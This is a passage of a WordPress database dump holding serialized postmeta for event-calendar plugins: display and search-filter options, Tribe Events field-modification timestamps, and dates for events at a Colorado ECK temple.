:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:14:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:16:\"load_more_button\";s:1:\"1\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}}'),(142409,265023,'sf-options','a:11:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(142408,265023,'sf_display_label','0'),(142406,265023,'author',''),(142407,265023,'sf_status','1'),(142405,265023,'tag',''),(142404,265023,'organizer',''),(142403,265023,'location',''),(142402,265023,'category','110'),(142401,265023,'label',''),(142400,265023,'_edit_last','2'),(135721,264209,'_RTECregistrationsDisabled','1'),(135722,264209,'_RTECdeadlineType','start'),(135692,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135691,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135690,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135713,264209,'_EventDuration','3600'),(135689,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135712,264209,'_EventEndDateUTC','2021-04-12 22:00:00'),(135715,264209,'_EventCurrencyPosition','prefix'),(135688,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135711,264209,'_EventStartDateUTC','2021-04-12 21:00:00'),(135716,264209,'_EventCost',''),(135717,264209,'_EventURL',''),(135687,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135710,264209,'_EventEndDate','2021-04-12 16:00:00'),(135718,264209,'_EventTimezone','America/Denver'),(135686,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135709,264209,'_EventStartDate','2021-04-12 15:00:00'),(135719,264209,'_EventTimezoneAbbr','MDT'),(135720,264209,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(135685,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135708,264209,'_EventShowMap',''),(141118,264882,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(135671,264209,'protect_children',''),(135672,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135673,264209,'_EventOrigin','events-calendar'),(135674,264209,'protect_children',''),(135675,264209,'protect_children',''),(135676,264209,'protect_children',''),(135677,264209,'protect_children',''),(135678,264209,'protect_children',''),(135679,264209,'protect_children',''),(135680,264209,'protect_children',''),(135681,264209,'protect_children',''),(135682,264209,'protect_children',''),(135683,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135707,264209,'_EventShowMapLink',''),(135714,264209,'_EventCurrencySymbol',''),(135684,264209,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1616330189;s:12:\"_EventOrigin\";i:1616330189;s:13:\"_thumbnail_id\";i:1616330633;s:24:\"boldgrid_hide_page_title\";i:1616330189;s:17:\"_EventShowMapLink\";i:1616330189;s:13:\"_EventShowMap\";i:1616330189;s:15:\"_EventStartDate\";i:1616330633;s:13:\"_EventEndDate\";i:1616330633;s:18:\"_EventStartDateUTC\";i:1616330633;s:16:\"_EventEndDateUTC\";i:1616330633;s:14:\"_EventDuration\";i:1616330189;s:20:\"_EventCurrencySymbol\";i:1616330189;s:22:\"_EventCurrencyPosition\";i:1616330189;s:10:\"_EventCost\";i:1616330189;s:9:\"_EventURL\";i:1616330189;s:14:\"_EventTimezone\";i:1616330189;s:18:\"_EventTimezoneAbbr\";i:1616330633;s:27:\"_EventNextPendingRecurrence\";i:1616330189;s:26:\"_RTECregistrationsDisabled\";i:1616330189;s:17:\"_RTECdeadlineType\";i:1616330190;s:19:\"_RTECwhoCanRegister\";i:1616330190;s:23:\"_RTEClimitRegistrations\";i:1616330190;s:21:\"_RTECmaxRegistrations\";i:1616330190;s:16:\"_EventRecurrence\";i:1616330190;s:18:\"_RTECnumRegistered\";i:1616330190;s:13:\"_EventVenueID\";i:1616330190;s:12:\"_dp_original\";i:1616330190;s:10:\"_edit_last\";i:1616330200;s:12:\"post_content\";i:1616331133;s:10:\"post_title\";i:1616330674;s:16:\"tribe_events_cat\";i:1616352732;s:11:\"post_status\";i:1616330633;}'),(135706,264209,'boldgrid_hide_page_title','0'),(160526,266604,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-12-18\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-12-18\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.3\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"o